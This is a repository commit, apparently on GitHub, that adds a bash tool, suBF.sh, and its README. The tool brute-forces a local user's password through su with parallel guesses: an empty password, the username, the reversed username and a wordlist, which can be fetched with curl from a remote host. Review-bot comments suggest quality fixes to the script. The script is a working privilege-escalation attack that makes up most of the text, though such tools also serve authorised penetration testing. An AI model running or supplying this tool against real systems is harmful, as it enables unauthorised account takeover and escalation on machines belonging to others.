add su-bruteforce
Mag1cByt3s committed Dec 22, 2024
1 parent 5ffc15b commit 83f0454
Showing 3 changed files with 12,732 additions and 0 deletions.
21 changes: 21 additions & 0 deletions Bruteforce/su-bruteforce/README.md
@@ -0,0 +1,21 @@
# su-bruteforce

This tool **bruteforces a selected user** using `su` and as passwords: **null password, username, reverse username and a wordlist (top12000.txt).**

You can specify a username using `-u <username>` and a wordlist via `-w <wordlist>`.

By **default** the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s). It **needs 143s to complete**.

You can configure these times using `-t` (timeout `su` process) and `-s` (sleep between 2 `su` processes).

**Fastest recommendation**: `-t 0.5` (minimun acceptable) and `-s 0.003` ~ **108s to complete.**
```
./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
```

In addition to files, you can **pipe the output from other commands** to provide the wordlist, examples:

```bash
curl -s http://10.10.10.10/wordlist.txt | ./suBF.sh -u <USERNAME> -w -
seq 0 1000 | ./suBF.sh -u <USERNAME> -w -
```
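
Review bot: the README omits the caveat that the script's own help text carries, that the username is case sensitive and is not checked for existence; add it next to the `-u <username>` line so it is visible without running `-h`. The first usage fence has no language tag while the second uses `bash`, and `minimun` should read `minimum`. The 143s and 108s figures only hold for the bundled `top12000.txt`, so say so where they are stated.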
66 changes: 66 additions & 0 deletions Bruteforce/su-bruteforce/suBF.sh
@@ -0,0 +1,66 @@
#!/bin/bash

help="This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).
You can specify a username using -u <username> and a wordlist via -w <wordlist>.
By default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete
You can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).
Fastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete
Example: ./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
THE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL\n\n"

WORDLIST="top12000.txt"
USER=""
TIMEOUTPROC="0.7"
SLEEPPROC="0.007"
while getopts "h?u:t:s:w:" opt; do
case "$opt" in
h|\?) printf "$help"; exit 0;;
u) USER=$OPTARG;;
t) TIMEOUTPROC=$OPTARG;;
s) SLEEPPROC=$OPTARG;;
w) WORDLIST=$OPTARG;;
esac
done

if ! [ "$USER" ]; then printf "$help"; exit 0; fi

if ! [[ -p /dev/stdin ]] && ! [ $WORDLIST = "-" ] && ! [ -f "$WORDLIST" ]; then echo "Wordlist ($WORDLIST) not found!"; exit 0; fi

C=$(printf '\033')

su_try_pwd (){
USER=$1
PASSWORDTRY=$2
trysu=`echo "$PASSWORDTRY" | timeout $TIMEOUTPROC su $USER -c whoami 2>/dev/null`
if [ "$trysu" ]; then
echo " You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
exit 0;
fi
}

su_brute_user_num (){
echo " [+] Bruteforcing $1..."
USER=$1
su_try_pwd $USER "" & #Try without password
su_try_pwd $USER $USER & #Try username as password
su_try_pwd $USER `echo $USER | rev 2>/dev/null` & #Try reverse username as password

if ! [[ -p /dev/stdin ]] && [ -f "$WORDLIST" ]; then
while IFS='' read -r P || [ -n "${P}" ]; do # Loop through wordlist file
su_try_pwd $USER $P & #Try TOP TRIES of passwords (by default 2000)
sleep $SLEEPPROC # To not overload the system
done < $WORDLIST

else
cat - | while read line; do
su_try_pwd $USER $line & #Try TOP TRIES of passwords (by default 2000)
sleep $SLEEPPROC # To not overload the system
done
fi
wait
}

su_brute_user_num $USER
echo " Wordlist exhausted" | sed "s,.*,${C}[1;31;107m&${C}[0m,"
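
Review bot: `USER=$1` in both `su_try_pwd` and `su_brute_user_num` reassigns the global `USER`, which is also the login environment variable; use a `local` variable with a different name. Expansions are unquoted throughout (`[ $WORDLIST = "-" ]`, `su_try_pwd $USER $P &`, `done < $WORDLIST`), so an empty value or one containing whitespace or glob characters is split or breaks the test, and the stdin branch uses `read line` without `IFS=` and `-r`, unlike the file branch. The missing `-u` and `Wordlist ... not found!` paths exit 0 and should return a non-zero status, `printf "$help"` passes the text as a format string instead of `printf '%b' "$help"`, and the comments saying `by default 2000` do not match the `top12000.txt` default.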